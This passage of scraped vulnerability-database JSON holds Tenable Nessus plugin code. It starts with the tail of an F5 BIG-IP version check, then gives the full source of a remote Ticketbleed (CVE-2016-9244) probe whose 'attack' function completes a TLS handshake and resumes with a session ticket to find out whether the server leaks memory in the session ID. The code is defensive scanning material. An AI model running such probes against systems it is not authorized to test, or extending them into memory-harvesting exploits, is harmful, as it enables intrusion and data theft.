audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K05121675\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\",\"11.2.1\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\",\"11.2.1\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\",\"11.2.1\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\",\"11.2.1\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\",\"11.2.1\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-02-04T10:01:48", "description": "Based on its response to a resumed TLS connection, the remote\nservice appears to be affected by an information disclosure\nvulnerability, known as Ticketbeed, in the TLS Session Ticket\nimplementation. The issue is due to the server incorrectly echoing\nback 32 bytes of memory, even if the Session ID was shorter. A remote\nattacker can exploit this vulnerability, by providing a 1-byte Session\nID, to disclose up to 31 bytes of uninitialized memory which may\ncontain sensitive information such as private keys, passwords, and\nother sensitive data.\n\nNote that this vulnerability is only exploitable if the non-default\nSession Tickets option enabled.", "edition": 15, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-02-15T00:00:00", "title": "F5 TLS Session Ticket Implementation Remote Memory Disclosure (Ticketbleed) (uncredentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9244"], "modified": "2017-02-15T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_analytics", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_SESSION_ID_MEM_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/97191", "sourceData": "#TRUSTED 220d8d5f2ca4ae7c9a1dc9dcb482ac1021519441a9cfe51ec087bd7d7331d8150f4911285b5109e02aac66f545a40a32b5b3c6ea9b832060bbc69fe295b3ce557ae21e1843c94b96f9e94eae44c24edf365d4557d3c8acbbd5e5e19dbf7331247f38f81f27666b4bb5367988bd291a40999c1012465a256ab6f69e4dd1a616729a8d0af4eb9bceb3408259759b476eabcffb917dec1197903d2ebf941a41b958ff618ef3bbb473c388a28792ed9008e89fbedd5fa2b747cbd53fe45ad3664e6ca5c49afacb1ecf1705c4ecc9adbb01c6bfcc3f8117e12b178f65e9c0b3ab80e7cd441f950a116fbe83f457f1ff7e94a4a54a1cfaa5a650e033b2080778220588090a8bad7b7da493825b55baff498475e3ef220bca37a8955323b291a2a3e34c2702b0c67821e7f8932fe8f09072751aee04dd20155e98edad429694cb14a539419ecf560a526d2b893cb0a491a24da8ba359663489bfddb56b792c7ab8ad5a56e5c35a45f129e839654d866e1e8ecf68847a726699d2adb84ad368e36b3cbbe1c0d04489b1f443a61480e8f22ddcc60dbfbcf5987262135e6abb6b343a357c08fbc6cc6929d9247f7131117d9a8b7479270da3543f062c2a48bbe29c192481a940d19ba01e16df92a42bff21fa7911ff256afdcba01babdf32551fdae6384736d6be0e4a72745b09b99270ebd838ba737c1780c008c83db2f43e5e2e83456f6\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97191);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/03\");\n\n script_cve_id(\"CVE-2016-9244\");\n script_xref(name:\"EDB-ID\", value:\"41298\");\n\n script_name(english:\"F5 TLS Session Ticket Implementation Remote Memory Disclosure (Ticketbleed) (uncredentialed check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Based on its response to a resumed TLS connection, the remote\nservice appears to be affected by an information disclosure\nvulnerability, known as Ticketbeed, in the TLS Session Ticket\nimplementation. The issue is due to the server incorrectly echoing\nback 32 bytes of memory, even if the Session ID was shorter. A remote\nattacker can exploit this vulnerability, by providing a 1-byte Session\nID, to disclose up to 31 bytes of uninitialized memory which may\ncontain sensitive information such as private keys, passwords, and\nother sensitive data.\n\nNote that this vulnerability is only exploitable if the non-default\nSession Tickets option enabled.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://filippo.io/Ticketbleed/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blog.filippo.io/finding-ticketbleed/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K05121675\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a fixed version according to the vendor advisory\n(K05121675). Alternatively, disable the Session Ticket option on the\naffected Client SSL profile.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9244\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/15\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_analytics\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssl_supported_versions.nasl\",\"bigip_web_detect.nasl\");\n script_require_keys(\"installed_sw/F5 BIG-IP web management\");\n script_require_ports(\"SSL/Supported\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('x509_func.inc');\ninclude('rsync.inc');\ninclude('ftp_func.inc');\ninclude('ldap_func.inc');\ninclude('nntp_func.inc');\ninclude('smtp_func.inc');\ninclude('telnet2_func.inc');\ninclude('ssl_funcs.inc');\ninclude('http.inc');\ninclude('install_func.inc');\n\napp = 'F5 BIG-IP web management';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\n##\n# Checks whether a cipher is in a list of cipher suites.\n#\n# @anonparam cipher Cipher in question.\n# @anonparam ciphers List of cipher suites.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction tls_cipher_in_list()\n{\n local_var cipher, ciphers, i, id, len;\n\n cipher = _FCT_ANON_ARGS[0];\n ciphers = _FCT_ANON_ARGS[1];\n\n len = strlen(ciphers);\n for (i = 0; i < len; i += 2)\n {\n id = substr(ciphers, i, i + 2 - 1);\n if (cipher == id) return TRUE;\n }\n\n return FALSE;\n}\n\n##\n# Pad the data for AES\n# Assumes AES, so a blocksize of 16 is assumed\n##\nfunction tls_pad(data)\n{\n local_var padlen;\n # Pad the message\n padlen = 16 - ((strlen(data) + 1) % 16);\n if (padlen == 0)\n padlen = 15;\n return data + crap(data:mkbyte(padlen), length:padlen + 1);\n}\n\n##\n# Computes the MAC of the data.\n#\n# @param client Whether the data is from the client or server.\n# @param data The data to calculate the MAC of.\n# @param type The type of the record.\n#\n# @returns The MAC of the given data, in protocol-specific form.\n##\nfunction tls_mac(key, seq, data, type, cipher_desc, version)\n{\n local_var hmac;\n\n cipher_desc = cipher_field(name:cipher_desc, field:\"mac\");\n # Encode the client sequence number.\n seq = mkdword(0) + mkdword(seq);\n\n if ('SHA512' >< cipher_desc)\n hmac = @HMAC_SHA512;\n\n if ('SHA384' >< cipher_desc && defined_func(\"HMAC_SHA384\"))\n hmac = @HMAC_SHA384;\n\n if ('SHA256' >< cipher_desc)\n hmac = @HMAC_SHA256;\n\n if ('SHA224' >< cipher_desc)\n hmac = @HMAC_SHA224;\n\n if ('SHA1' >< cipher_desc)\n hmac = @HMAC_SHA1;\n\n if ('MD5' >< cipher_desc)\n hmac = @HMAC_MD5;\n\n if (isnull(hmac))\n return NULL;\n\n return hmac(\n key:key,\n data:seq + tls_mk_record(type:type, data:data, version:version)\n );\n}\n\n##\n# Split the key block into IVs, cipher keys, and MAC keys.\n#\n# @anonparam keyblk Key block derived from the master secret.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction tls_set_keys(cipher_desc, keyblk)\n{\n local_var mac_size, iv_size, key_size, pos, tls;\n local_var mac, encryption;\n\n # Determine the size of the key block's fields.\n mac = cipher_field(name:cipher_desc, field:\"mac\");\n if ('SHA1' >< mac) mac_size = 20;\n else if ('SHA256' >< mac) mac_size = 32;\n else return FALSE;\n\n encryption = cipher_field(name:cipher_desc, field:\"encrypt\");\n if ('AES-CBC(128)' >< encryption) { key_size = 16; iv_size = 16; }\n else if ('AES-CBC(256)' >< encryption) { key_size = 32; iv_size = 16; }\n else return FALSE;\n\n # Ensure the block is big enough.\n if (strlen(keyblk) < 2 * (mac_size + key_size + iv_size))\n return FALSE;\n\n # Extract the data from the key block.\n pos = 0;\n tls['enc_mac_key'] = substr(keyblk, pos, pos + mac_size - 1); pos += mac_size;\n tls['dec_mac_key'] = substr(keyblk, pos, pos + mac_size - 1); pos += mac_size;\n tls['enc_key'] = substr(keyblk, pos, pos + key_size - 1); pos += key_size;\n tls['dec_key'] = substr(keyblk, pos, pos + key_size - 1); pos += key_size;\n tls['enc_iv'] = substr(keyblk, pos, pos + iv_size - 1); pos += iv_size;\n tls['dec_iv'] = substr(keyblk, pos, pos + iv_size - 1);\n\n return tls;\n}\n\n##\n##\n# Tries to make a TLS connection to the server.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction attack(port, ciphers)\n{\n local_var soc, data, rec, srv_random, clt_random, version, cipher_desc;\n local_var cert, clt_cert_requested, skex, premaster, n, e, dh_privkey;\n local_var ckex, keyblk, tls_keys, tls_ciphertext, handshake_transcript, master_secret;\n local_var finished, session_ticket, srv_change_cipher_spec_received;\n local_var session_id;\n\n # Get a socket to perform a handshake.\n soc = open_sock_ssl(port);\n if (!soc)\n return [FALSE, \"open_sock_ssl\", \"Couldn't open TCP or STARTTLS socket to service.\"];\n\n data = client_hello(\n v2hello:FALSE,\n version:mkword(TLS_10), # Record-layer version (RFC5246 Appendix E)\n maxver:mkword(TLS_12), # Handshake version; maximum we support\n cipherspec:ciphers,\n extensions:tls_ext(type:35, data:\"\") # Session Tickets supported\n );\n send(socket:soc, data:data);\n rec = ssl_parse(blob:data);\n # Hang onto the Client Random; we need it to derive keys later.\n clt_random = mkdword(rec['time']) + rec['random'];\n\n # Begin collecting bodies of handshake messages (without record layer)\n handshake_transcript = substr(data, 5, strlen(data) - 1);\n\n # Read records one at a time. Expect to see at a minimum:\n # ServerHello, Certificate, and ServerHelloDone.\n while (TRUE)\n {\n # Receive a record from the server.\n data = recv_ssl(socket:soc);\n if (isnull(data))\n {\n close(soc);\n return [FALSE, \"recv_ssl\", \"Did not receive expected messages from server in reply to ClientHello.\"];\n }\n\n # Continue collecting bodies of handshake messages (stripping off\n # record-layer header)\n if (!isnull(ssl_find(blob:data, 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE)))\n handshake_transcript += substr(data, 5, strlen(data) - 1);\n\n # ServerHello: Extract the random data for computation of keys.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO\n );\n\n if (!isnull(rec))\n {\n if (rec['extension_session_ticket'] != TRUE)\n return [FALSE, \"ticket_support\", \"Server does not support TLS Session Tickets.\"];\n\n # If server asks for version less than TLS 1.0 or higher than TLS 1.2, fail.\n if (rec['handshake_version'] < TLS_10 || rec['handshake_version'] > TLS_12)\n return [FALSE, \"handshake_version\", \"Server does not support TLS 1.0, 1.1, or 1.2.\"];\n\n # Use the TLS version the server wants\n version = rec['handshake_version'];\n\n srv_random = mkdword(rec['time']) + rec['random'];\n\n # Wacko SSL servers might return a cipher suite not in the\n # client's request list.\n if (!tls_cipher_in_list(mkword(rec['cipher_spec']), ciphers))\n {\n close(soc);\n return [FALSE, \"cipher_spec\", \"Server ignored our list of supported ciphers.\"];\n }\n\n # Store the negotiated cipher suite.\n cipher_desc = ciphers_desc[cipher_name(id:rec['cipher_spec'])];\n\n if (isnull(cipher_desc))\n {\n close(soc);\n return [FALSE, \"cipher_spec\", \"Assertion failure.\"];\n }\n }\n\n # Certificate: Extract the server's public key.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE\n );\n\n if (!isnull(rec) && max_index(rec['certificates']) > 0)\n {\n # First cert in the chain should be the server cert.\n cert = parse_der_cert(cert:rec['certificates'][0]);\n if (isnull(cert))\n {\n close(soc);\n return [FALSE, \"parse_der_cert\", \"Failed to parse server's certificate.\"];\n }\n cert = cert['tbsCertificate'];\n }\n\n # Server Key Exchange.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_KEY_EXCHANGE\n );\n\n if (!isnull(rec['data']))\n skex = ssl_parse_srv_kex(blob:rec['data'], cipher:cipher_desc, version:version);\n\n # Certificate Request.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE_REQUEST\n );\n\n if (!isnull(rec['data']))\n clt_cert_requested = TRUE;\n\n # Server Hello Done.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO_DONE\n );\n\n # When we get a ServerHelloDone, it's our turn to send again.\n if (!isnull(rec))\n break;\n\n # Is it an alert?\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_ALERT\n );\n\n if (!isnull(rec))\n {\n close(soc);\n return [FALSE, \"handshake_failure\", \"Server sent alert to ClientHello. Level: \" + rec['level'] + \", description: \" + rec['description']];\n }\n }\n\n # Will contain an empty ClientCertificate (if requested), ClientKeyExchange,\n data = '';\n\n # Create an empty client certificate if one is requested.\n if (clt_cert_requested)\n {\n # Send an empty certificate for now. TLSv1.0 says the client can\n # send an empty certificate.\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n version:version,\n data:ssl_mk_handshake_msg(\n type : SSL3_HANDSHAKE_TYPE_CERTIFICATE,\n data : ssl_vldata_put(data:NULL,len:3)\n )\n );\n handshake_transcript += substr(data, 5, strlen(data) - 1);\n }\n\n # Process ServerCertificate and ServerKeyExchange messages.\n var kex_desc = cipher_field(name:cipher_desc, field:\"kex\");\n if (kex_desc =~ \"RSA($|\\()\")\n {\n if (isnull(cert))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"Server selected RSA key exchange but didn't provide a certificate.\"];\n }\n\n if (isnull(cert['subjectPublicKeyInfo']) || isnull(cert['subjectPublicKeyInfo'][1]))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"A server certificate with an unsupported algorithm was found.\"];\n }\n\n n = cert['subjectPublicKeyInfo'][1][0];\n e = cert['subjectPublicKeyInfo'][1][1];\n\n if (isnull(n) || isnull(e))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"Failed to extract public key from server certificate.\"];\n }\n\n premaster = mkword(TLS_12) + rand_str(length:46);\n\n # Encrypt the premaster secret with server's RSA public key.\n ckex = rsa_public_encrypt(data:premaster, n:n, e:e);\n\n # It looks like TLS 1.0 and up prepend a two-byte length, but the\n # RFC is vague.\n if (version >= TLS_10)\n ckex = ssl_vldata_put(data:ckex, len:2);\n }\n else if (kex_desc =~ \"DH($|\\()\")\n {\n if (isnull(skex))\n {\n close(soc);\n return [FALSE, \"dh_kx\", \"Server selected DH key exchange but didn't provide a ServerKeyExchange.\"];\n }\n\n # Generate the client private key,\n dh_privkey = rand_str(length:16);\n\n # Compute the premaster secret.\n premaster = bn_mod_exp(skex['dh_y'], dh_privkey, skex['dh_p']);\n\n # Encode the client's DH public key\n ckex = ssl_vldata_put(\n data:bn_mod_exp(skex['dh_g'], dh_privkey, skex['dh_p']),\n len:2\n );\n }\n else\n {\n close(soc);\n return [FALSE, \"kx\", \"Unsupported key exchange method.\"];\n }\n\n # Create a ClientKeyExchange record\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n version:version,\n data:ssl_mk_handshake_msg(\n type:SSL3_HANDSHAKE_TYPE_CLIENT_KEY_EXCHANGE,\n data:ckex\n )\n );\n handshake_transcript += substr(data, 5, strlen(data) - 1);\n\n master_secret = ssl_calc_master(\n c_random:clt_random,\n s_random:srv_random,\n version:version,\n premaster:premaster,\n cipher_desc:cipher_desc\n );\n\n # For troubleshooting problems, when a PCAP is provided by a customer\n # and we need to see the encrypted Finished message or alert messages.\n set_kb_item(\n name:\"nss_keylog/\" + SCRIPT_NAME,\n value:\"CLIENT_RANDOM \" + hexstr(clt_random) + \" \" + hexstr(master_secret)\n );\n\n tls_keys = tls_set_keys(\n cipher_desc:cipher_desc,\n keyblk:ssl_derive_keyblk(\n c_random:clt_random,\n s_random:srv_random,\n version:version,\n master:master_secret,\n cipher_desc:cipher_desc\n )\n );\n\n if (tls_keys == FALSE)\n {\n close(soc);\n return [FALSE, \"kx\", \"Failed to make TLS keys from key exchange.\"];\n }\n\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_CHANGECIPHERSPEC,\n data:mkbyte(1),\n version:version\n );\n\n finished = ssl_mk_handshake_msg(\n type:SSL3_HANDSHAKE_TYPE_FINISHED,\n data:ssl_calc_finished(\n master:master_secret,\n handshake:handshake_transcript,\n is_client:TRUE,\n version:version,\n cipher_desc:cipher_desc\n )\n );\n handshake_transcript += finished;\n\n # MAC the finished message\n finished += tls_mac(key:tls_keys['enc_mac_key'], seq:0, version:version, type:SSL3_CONTENT_TYPE_HANDSHAKE, cipher_desc:cipher_desc, data:finished);\n\n # Use a random IV, as it's included explicitly in TLS 1.1\n if (version >= TLS_11)\n tls_keys['enc_iv'] = rand_str(length:strlen(tls_keys['enc_iv']));\n\n finished = tls_pad(data:finished);\n\n # Encrypt the finished message\n tls_ciphertext = aes_cbc_encrypt(\n data:finished,\n iv:tls_keys['enc_iv'],\n key:tls_keys['enc_key']\n );\n\n # TLS 1.1+ explicitly includes the IV in each record\n if (version >= TLS_11)\n {\n tls_ciphertext = tls_keys['enc_iv'] + tls_ciphertext[0];\n }\n # In TLS 1.0 we don't include the IV in the record, and we do have\n # to hang onto the CBC residue for the next record.\n else\n {\n tls_keys['enc_iv'] = tls_ciphertext[1];\n tls_ciphertext = tls_ciphertext[0];\n }\n\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n data:tls_ciphertext,\n version:version\n );\n\n # Send the ChangeCipherSpec and the Finished message\n send(socket:soc, data:data);\n\n while (TRUE)\n {\n # Receive a record from the server.\n data = recv_ssl(socket:soc);\n if (isnull(data))\n {\n close(soc);\n return [FALSE, \"after_ckex\", \"Server did not send all expected messages in its last flight of handshakes.\"];\n }\n\n # Is it an alert?\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_ALERT\n );\n if (!isnull(rec))\n {\n close(soc);\n if (clt_cert_requested)\n return [FALSE, \"after_ckex\", \"Server sent an alert to our ClientKeyExchange (and a client certificate was requested).\"];\n else\n return [FALSE, \"after_ckex\", \"Server sent an alert to our ClientKeyExchange.\"];\n }\n\n # Keep collecting handshake bodies, only for not-encrypted handshake bodies\n if (ssl_find(blob:data, encrypted:FALSE, 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE))\n handshake_transcript += substr(data, 5, strlen(data) - 1);\n\n # The session ticket\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_NEW_SESSION_TICKET\n );\n if (!isnull(rec))\n session_ticket = rec['ticket'];\n\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_CHANGECIPHERSPEC\n );\n if (!isnull(rec))\n srv_change_cipher_spec_received = TRUE;\n\n # Looking for the encrypted Finished message\n # When we get it we're done receiving and we're ready to close\n # the connection with a close_notify alert\n rec = ssl_find(\n blob:data,\n encrypted:TRUE,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE\n );\n if (!isnull(rec) && srv_change_cipher_spec_received)\n {\n if (isnull(session_ticket))\n {\n close(soc);\n return [FALSE, \"lied_about_ticket\", \"Server did not send a session ticket despite indicating support.\"];\n }\n\n # TLS 1.1 explicitly includes the IV in the record\n if (version >= TLS_11)\n {\n tls_keys['dec_iv'] = substr(data, 5, strlen(tls_keys['dec_iv']) + 4);\n rec[\"data\"] = substr(data, 5 + strlen(tls_keys['dec_iv']));\n }\n\n tls_ciphertext = aes_cbc_decrypt(\n data:rec[\"data\"],\n iv:tls_keys['dec_iv'],\n key:tls_keys['dec_key']\n );\n\n # Retain CBC residue for the next record\n if (version == TLS_10)\n tls_keys['dec_iv'] = tls_ciphertext[1];\n\n tls_ciphertext = tls_ciphertext[0];\n finished = ssl_mk_handshake_msg(\n type:SSL3_HANDSHAKE_TYPE_FINISHED,\n data:ssl_calc_finished(\n master:master_secret,\n handshake:handshake_transcript,\n is_client:FALSE,\n version:version,\n cipher_desc:cipher_desc\n )\n );\n finished += tls_mac(\n key:tls_keys['dec_mac_key'],\n seq:0,\n version:version,\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n cipher_desc:cipher_desc,\n data:finished\n );\n finished = tls_pad(data:finished);\n if (finished != tls_ciphertext)\n {\n close(soc);\n return [FALSE, \"srv_finished\", \"Server's Finished value or MAC is wrong or key agreement failed.\"];\n }\n\n # Server's finished and first encrypted record was correct, so we're\n # ready to send again and have agreed correctly on some keys\n break;\n }\n }\n\n # We're ready to try resuming, with a new connection.\n close(soc);\n soc = open_sock_ssl(port);\n if (!soc)\n return [FALSE, \"open_sock_ssl\", \"Couldn't open TCP or STARTTLS socket to service to resume.\"];\n\n # We send a 20-byte session ID. Max length is 32 bytes.\n session_id = rand_str(length:20);\n\n data = client_hello(\n v2hello:FALSE,\n version:mkword(TLS_10), # Record-layer version (RFC5246 Appendix E)\n maxver:mkword(TLS_12), # Handshake version; maximum we support\n cipherspec:ciphers,\n sessionid:session_id,\n extensions:tls_ext(type:35, data:session_ticket)\n );\n send(socket:soc, data:data);\n data = recv_ssl(socket:soc);\n if (isnull(data))\n {\n close(soc);\n return [FALSE, \"resume\", \"Server didn't reply to resumed connection attempt.\"];\n }\n\n # We're done receiving now\n close(soc);\n\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO\n );\n if (isnull(rec))\n return [FALSE, \"resume_serverhello\", \"Server did not reply with a ServerHello to the resumed connection attempt.\"];\n\n if (rec[\"session_id\"] == session_id)\n return [FALSE, \"session_id_mismatch\", \"Server replied with a session ID that matches exactly what Nessus sent.\"];\n\n if (strlen(rec[\"session_id\"]) == 0)\n return [FALSE, \"session_id_zero\", \"Server replied with a zero-length session ID.\"];\n\n # Vulnerable!\n # Is the session ID from the server bigger than what we sent, and, does it start with the session ID we picked?\n if (strlen(rec[\"session_id\"]) > strlen(session_id) && substr(rec[\"session_id\"], 0, strlen(session_id) - 1) == session_id)\n return [\n TRUE,\n \"session_id_length\",\n \"Nessus sent the \" + strlen(session_id) + \"-byte session ID \" + hexstr(session_id) + \". The server replied with the \" + strlen(rec[\"session_id\"]) + \"-byte session ID \" + hexstr(rec[\"session_id\"]) + \".\"\n ];\n\n return [FALSE, \"assertion_failure\", \"Something went wrong with the test.\"];\n}\n\nget_kb_item_or_exit('SSL/Supported');\n\n# Get a port that uses SSL.\nport = get_ssl_ports(fork:TRUE);\n\nif (isnull(port))\n exit(1, 'The host does not appear to have any SSL-based services.');\n\n# Find out if the port is open.\nif (!get_port_state(port))\n audit(AUDIT_PORT_CLOSED, port, \"TCP\");\n\nresult = attack(port:port, ciphers:\n ciphers['TLS1_CK_RSA_WITH_AES_128_CBC_SHA'] + # <- Required by all TLS 1.2 impls.\n ciphers['TLS1_CK_RSA_WITH_AES_256_CBC_SHA'] +\n ciphers['TLS1_CK_DHE_RSA_WITH_AES_128_CBC_SHA'] +\n ciphers['TLS1_CK_DHE_RSA_WITH_AES_256_CBC_SHA'] +\n 